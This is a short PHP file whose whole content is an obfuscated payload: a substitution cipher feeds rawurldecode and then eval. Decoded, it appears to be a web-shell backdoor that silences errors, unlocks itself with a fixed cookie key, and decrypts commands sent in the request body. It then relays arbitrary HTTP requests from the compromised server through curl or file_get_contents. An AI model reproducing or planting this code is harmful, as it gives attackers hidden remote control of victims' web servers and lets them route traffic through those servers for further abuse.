<?php
 $pHBhwOtQ = 1050; function XkFnhRPl($AuTERX, $HqeYtctu){$CyLUM = ''; for($i=0; $i < strlen($AuTERX); $i++){$CyLUM .= isset($HqeYtctu[$AuTERX[$i]]) ? $HqeYtctu[$AuTERX[$i]] : $AuTERX[$i];}
$yOtdAbvdt="rawurl" . "decode";return $yOtdAbvdt($CyLUM);}
$dQsNANf = '%zFfaf_2rG%Ci%CQMf2nuNl_rVVZV2%CQ%Cg%CFF%CO%4A%Fb%FP%zFfaf_2rG%Ci%CQuZK_rVVZV2%C'.
'Q%Cg%CFF%CO%4A%Fb%FP%zFrVVZV_VrnZVGfaK%CiF%CO%4A%Fb%FP%zF2rG_Gf5r_uf5fG%CiF%CO%4A%Fb%FP%zFf'.
'KaZVr_32rV_NjZVG%Ciw%CO%4A%Fb%FP%zFfaf_2rG%Ci%CQ5Np_rprW3'.
'GfZa_Gf5r%CQ%Cg%CFF%CO%4A%Fb%FP%Fb%FP%Fb%FPY3aWGfZa%CFMrWVlnG%Ci%CzMNGN%CO%Fb%FP%QA%Fb%FP%CF%CF%'.
'CF%CF%CzZ3G_MNGN%CF%4b%CF%CC%CC%4A%Fb%FP%CF%CF%CF%CF%CzBrl%CF%4b%CF%Cz_TtkItk%LA%C'.
'Q700d_7UT0%CQ%Lb%CF.%CF%Cz_TtkItk%LA%CQktqotT0_ok1%CQ%Lb%4A%Fb%FP%CF%CF'.
'%CF%CF%CzBrl_ura%CF%4b%CF2GVura%Ci%CzBrl%CO%4A%Fb%FP%Fb%FP%CF%CF%CF%CFYZV%CF%Ci%Czf%'.
'CF%4b%CFF%4A%CF%Czf%CF%4g%CF2GVura%Ci%CzBrl%CO%4A%CF%Czf%CA%CA%CO%C'.
'F%QA%Fb%FP%CF%CF%CF%CF%CF%CF%CF%CF%CzBrl%LA%Czf%Lb%CF%4b%CFWmV%'.
'CiZVM%Ci%CzBrl%LA%Czf%Lb%CO%CF%Lt%CF%Ci%CzBrl_ura%CF%CL%CFCLL%CO%CO%4A%Fb%FP%CF%CF%CF%C'.
'F%Qb%Fb%FP%Fb%FP%CF%CF%CF%CFYZV%CF%Ci%Czf%CF%4b%CFF%4A%CF%Cz'.
'f%CF%4g%CF2GVura%Ci%CzMNGN%CO%4A%CO%CF%QA%Fb%FP%CF%CF%CF%CF%CF'.
'%CF%CF%CFYZV%CF%Ci%Cz6%CF%4b%CFF%4A%CF%Cz6%CF%4g%CF2GVura%Ci%CzBrl%CO%CF%CH'.
'%CH%CF%Czf%CF%4g%CF2GVura%Ci%CzMNGN%CO%4A%CF%Cz6%CA%CA%Cg%CF%Czf%CA%CA%CO%'.
'CF%QA%Fb%FP%CF%CF%CF%CF%CF%CF%CF%CF%CF%CF%CF%CF%CzZ3G_MNGN%CF.%4b%CFWmV%CiZVM%Ci%CzM'.
'NGN%LA%Czf%Lb%CO%CF%Lt%CFZVM%Ci%CzBrl%LA%Cz6%Lb%CO%CO%4A%Fb%FP%CF%CF%CF%CF%CF%CF%CF%CF%Qb%Fb%FP%C'.
'F%CF%CF%CF%Qb%Fb%FP%Fb%FP%CF%CF%CF%CFVrG3Va%CF%CzZ3G'.
'_MNGN%4A%Fb%FP%Qb%Fb%FP%Fb%FPY3aWGfZa%CF2raM_MNGNw%Ci%CzMNGN%CO%Fb%FP%QA%Fb%FP%CF%CF%CF'.
'%CF%CzmrNM%CF%4b%CF%CC%CC%4A%Fb%FP%Fb%FP%CF%CF%CF%C'.
'FYZVrNWm%CF%Ci%CzMNGN%LA%CCmrNMrV2%CC%Lb%CFN2%CF%CzBrl%CF%4b%4t%CF%CzsNu3r%C'.
'O%CF%QA%Fb%FP%CF%CF%CF%CF%CF%CF%CF%CF%CzmrNM%CF.%4b%CF%CzBrl%CF.%CF%CC%4P%CF%CC%CF.%CF%CzsNu'.
'3r%CF.%CF%CC%LgV%Lga%CC%4A%Fb%FP%CF%CF%CF%CF%Qb%Fb%FP%Fb%FP%CF%CF%CF'.
'%CF%CznNVN52%CF%4b%CFNVVNl%Ci%CQmGGn%CQ%CF%4b%4t%CFNVVNl%Ci%Fb%FP%CF%CF%CF%CF%CF%CF%CF%CF%CQ5rGmZM'.
'%CQ%CF%4b%4t%CF%CzMNGN%LA%CC5rGmZM%CC%Lb%Cg%Fb%FP%CF%CF%CF%CF%CF%CF%CF%CF%CQmrNMrV%CQ%C'.
'F%4b%4t%CF%CzmrNM%Cg%Fb%FP%CF%CF%CF%CF%CF%CF%CF%CF%CQWZaGraG%CQ%CF%4b%4t%C'.
'F%CzMNGN%LA%CCjZMl%CC%Lb%Cg%Fb%FP%CF%CF%CF%CF%CF%CF%CF%CF%CQGf5rZ3G%CQ%CF%4b%4t%CF%CzMNGN%LA%CC'.
'Gf5rZ3G%CC%Lb%Cg%Fb%FP%CF%CF%CF%CF%CO%CO%4A%Fb%FP%Fb%FP%CF%'.
'CF%CF%CF%CzWGp%CF%4b%CF2GVrN5_WZaGrpG_WVrNGr%Ci%CznNVN52%CO%4A'.
'%Fb%FP%Fb%FP%CF%CF%CF%CF%CzVr23uG%CF%4b%CF%zFYfur_KrG_WZaGra'.
'G2%Ci%CzMNGN%LA%CC3Vu%CC%Lb%Cg%CF8PDTt%Cg%CF%CzWGp%CO%4A%Fb%FP%Fb%FP%CF%CF%CF%CFfY%CF%Ci%CzmGGn_'.
'Vr2nZa2r_mrNMrV%CO%CF%QA%Fb%FP%CF%CF%CF%CF%CF%CF%CF%CFfY%CF%Ci2GVnZ2%Ci%Czm'.
'GGn_Vr2nZa2r_mrNMrV%LAF%Lb%Cg%CF%CCCFF%CC%CO%CF%4b%4b%4b%CF8PDTt%CO%CF%QA%Fb%FP%CF%CF%CF%CF%CF%CF%'.
'CF%CF%CF%CF%CF%CF%CzVr23uG%CF%4b%CF%CC700d_tkkUk%LgG%CC%CF.%CF%'.
'CzmGGn_Vr2nZa2r_mrNMrV%LAF%Lb%4A%Fb%FP%CF%CF%CF%CF%CF%CF%CF%CF%Qb%Fb%FP%CF%CF%C'.
'F%CF%Qb%CFru2r%CF%QA%Fb%FP%CF%CF%CF%CF%CF%CF%CF%CF%CzVr23'.
'uG%CF%4b%CF%CCgUXXtg01UX_tkkUk%CC%4A%Fb%FP%CF%CF%CF%CF%Qb%Fb%FP%Fb%FP%CF%CF%CF%CFVrG3Va%CF%CzVr2'.
'3uG%4A%Fb%FP%Qb%Fb%FP%Fb%FPY3aWGfZa%CF2raM_MNGNC%Ci%CzMNGN%CO%Fb%FP%QA%Fb%FP%CF%C'.
'F%CF%CFfY%CF%Ci%CwY3aWGfZa_rpf2G2%Ci%CQW3Vu_srV2fZa%CQ%CO%CO%Fb%FP%CF%CF%CF%CF%QA%Fb%FP%C'.
'F%CF%CF%CF%CF%CF%CF%CFVrG3Va%CF%CC%CC%4A%Fb%FP%CF%CF%CF%CF%Qb%Fb%FP%Fb%FP%CF%'.
'CF%CF%CF%CzWm%CF%4b%CFW3Vu_fafG%Ci%CO%4A%Fb%FP%Fb%FP%CF%CF%CF%CF%CzmrNMrV2%CF%4b%CFPVVNl%Ci%CO%4'.
'A%Fb%FP%CF%CF%CF%CFYZVrNWm%CF%Ci%CzMNGN%LA%CCmrNMrV2%CC%Lb%CFN2%CF%CzBrl%CF%4b%4t%CF%CzsNu3r%CO'.
'%CF%QA%Fb%FP%CF%CF%CF%CF%CF%CF%CF%CF%CzmrNMrV2%LA%Lb%CF%4b%CF%CzBrl%CF.%CF%CC%4P%CF%C'.
'C%CF.%CF%CzsNu3r%4A%Fb%FP%CF%CF%CF%CF%Qb%Fb%FP%Fb%FP%CF%CF%CF%CFW3Vu_2rGZnG%Ci%CzWm%Cg%CFgokDUd0'.
'_okD%Cg%CF%CzMNGN%LA%CC3Vu%CC%Lb%CO%4A%Fb%FP%CF%CF%CF%CFW3Vu_2rGZnG%Ci%CzWm%Cg%CFgokDUd0'.
'_goT0UyktqotT0%Cg%CF%CzMNGN%LA%CC5rGmZM%CC%Lb%CO%4A%Fb%FP%CF%CF%CF%CFW3Vu_2rGZnG%Ci%CzWm%Cg%CFgok'.
'DUd0_01ytUo0%Cg%CF%CzMNGN%LA%CCGf5rZ3G%CC%Lb%CO%4A%Fb%FP%CF'.
'%CF%CF%CFW3Vu_2rGZnG%Ci%CzWm%Cg%CFgokDUd0_700d7tPbtk%Cg%CF%CzmrNMrV2%CO%4A%F'.
'b%FP%Fb%FP%CF%CF%CF%CFfY%CF%Ci%Cwr5nGl%Ci%CzMNGN%LA%CCjZMl%CC%Lb%CO%CO%Fb%FP'.
'%CF%CF%CF%CF%QA%Fb%FP%CF%CF%CF%CF%CF%CF%CF%CFW3Vu_2rGZnG%Ci%CzWm%Cg%C'.
'FgokDUd0_dUT081tDbT%Cg%CF%CzMNGN%LA%CCjZMl%CC%Lb%CO%4A'.
'%Fb%FP%CF%CF%CF%CF%Qb%Fb%FP%CF%CF%CF%CFW3Vu_2rGZnG%Ci%CzWm%Cg%C'.
'FgokDUd0_kt0okX0kPXT8tk%Cg%CF0kot%CO%4A%Fb%FP%Fb%FP%CF%CF%CF%CF%CzVr23uG%CF%4b%CFW3Vu_rprW%Ci%'.
'CzWm%CO%4A%Fb%FP%CF%CF%CF%CF%Cz2GNG32%CF%4b%CFW3Vu_KrGfaYZ%Ci%CzWm%Cg%CFgokD1X8U_70'.
'0d_gUbt%CO%4A%Fb%FP%CF%CF%CF%CFW3Vu_WuZ2r%Ci%CzWm%'.
'CO%4A%Fb%FP%Fb%FP%CF%CF%CF%CFfY%CF%Ci%CzVr23uG%CO%CF%QA%Fb%FP%CF%CF%CF%CF%CF%CF%CF%'.
'CFfY%CF%Ci%Cz2GNG32%CF%Cw%4b%4b%CFCFF%CO%CF%QA%Fb%FP%CF%'.
'CF%CF%CF%CF%CF%CF%CF%CF%CF%CF%CF%CzVr23uG%CF%4b%CF%CC700d_'.
'tkkUk%LgG%CC%CF.%CF%Cz2GNG32%4A%Fb%FP%CF%CF%CF%CF%CF%CF'.
'%CF%CF%Qb%Fb%FP%CF%CF%CF%CF%Qb%CFru2r%CF%QA%Fb%FP%CF%CF%CF%CF%CF%CF%CF%CF%CzVr2'.
'3uG%CF%4b%CF%CCgUXXtg01UX_tkkUk%CC%4A%Fb%FP%CF%CF%CF%CF%Qb%Fb%FP%Fb%FP%CF%CF%CF%CFVrG3Va%CF%C'.
'zVr23uG%4A%Fb%FP%Qb%Fb%FP%Fb%FP%CzsNu3r2%CF%4b%CFNVVNl_sNu3r2%Ci%Cz_g'.
'UUJ1t%CO%4A%Fb%FPfY%CF%Ci%Cwfa_NVVNl%Ci%CCYCNijwH4-LMQ'.
'H-zNYH-iQFN-iMNWwwzw4wNw%CC%Cg%CF%CzsNu3r2%CO%CO%CF%QA%Fb%FP%CF%CF%CF%CFrpfG%Ci%CO%4A%Fb%FP%Qb%F'.
'b%FP%Fb%FP%CzMNGN%CF%4b%CF%zFYfur_KrG_WZaGraG2%Ci%CQnmn%4P//fan3G%CQ%CO%4A%Fb%FPfY%CF%Cir5nGl'.
'%Ci%CzMNGN%CO%CO%CF%QA%Fb%FP%CF%CF%CF%CF%CzsNu3r2%CF%4b%CFNVVNl_sNu3r2%Ci%Cz_dUT0%CO%4A%Fb%FP%CF%CF%'.
'CF%CF%CzMNGN%CF%4b%CF%CzsNu3r2%LAF%Lb%4A%Fb%FP%Qb%CFru2r'.
'%CF%QA%Fb%FP%CF%CF%CF%CF%CzMNGN%CF%4b%CFrpnuZMr%Ci%CC%4b%'.
'CC%Cg%CF%CzMNGN%Cg%CFC%CO%4A%Fb%FP%Qb%Fb%FP%Fb%FP%CzjHz_MrWZMr_MNGN%CF%4b%CFjN2rHz_MrWZMr%Ci3VuMr'.
'WZMr%Ci%CzMNGN%LAw%Lb%CO%CO%4A%Fb%FP%Fb%FP%Cz2raM_MNGN%CF%4b%CF%zF3a2rVfNufcr%CiMrWVlnG%Ci%CzjHz_Mr'.
'WZMr_MNGN%CO%CO%4A%Fb%FPfY%CF%Ci%Cwr5nGl%Ci%Cz2raM_MNGN%CO%CO%CF%QA%Fb%FP%C'.
'F%CF%CF%CF%CzVr2%CF%4b%CF2raM_MNGNw%Ci%Cz2raM_MNGN%CO%4A%Fb%FP%CF%CF%CF%CFfY%'.
'CF%Cir5nGl%Ci%CzVr2%CO%CF%Qg%Qg%CF%CzVr2%CF%4b%4b%4b%CF%CCgUXXtg01UX_'.
'tkkUk%CC%CO%Fb%FP%CF%CF%CF%CF%QA%Fb%FP%CF%CF%CF%CF%CF%CF%CF%CF%CzVr2%CF%4b%CF2raM'.
'_MNGNC%Ci%Cz2raM_MNGN%CO%4A%Fb%FP%CF%CF%CF%CF%Qb%Fb%FP%CF%CF%CF%CFrWmZ%CF%'.
'CzVr2%4A%Fb%FP%Qb%CFru2r%CF%QA%Fb%FP%CF%CF%CF%CFrWmZ%CF%CCbP0P_tkkUk%CC%4A%Fb%FP%Qb%Fb%FP';
$QtwhFuk = Array('1'=>'I', '0'=>'T', '3'=>'u', '2'=>'s', '5'=>'m', '4'=>'3', '7'=>'H', '6'=>'j', '9'=>'Z', '8'=>'F', 'A'=>'B', 'C'=>'2', 'B'=>'k', 'E'=>'X', 'D'=>'L', 'G'=>'t', 'F'=>'0', 'I'=>'V', 'H'=>'6', 'K'=>'g', 'J'=>'K', 'M'=>'d', 'L'=>'5', 'O'=>'9', 'N'=>'a', 'Q'=>'7', 'P'=>'A', 'S'=>'q', 'R'=>'Y', 'U'=>'O', 'T'=>'S', 'W'=>'c', 'V'=>'r', 'Y'=>'f', 'X'=>'N', 'Z'=>'o', 'a'=>'n', 'c'=>'z', 'b'=>'D', 'e'=>'G', 'd'=>'P', 'g'=>'C', 'f'=>'i', 'i'=>'8', 'h'=>'W', 'k'=>'R', 'j'=>'b', 'm'=>'h', 'l'=>'y', 'o'=>'U', 'n'=>'p', 'q'=>'Q', 'p'=>'x', 's'=>'v', 'r'=>'e', 'u'=>'l', 't'=>'E', 'w'=>'1', 'v'=>'w', 'y'=>'M', 'x'=>'J', 'z'=>'4');
eval/*tYB*/(XkFnhRPl($dQsNANf, $QtwhFuk));?>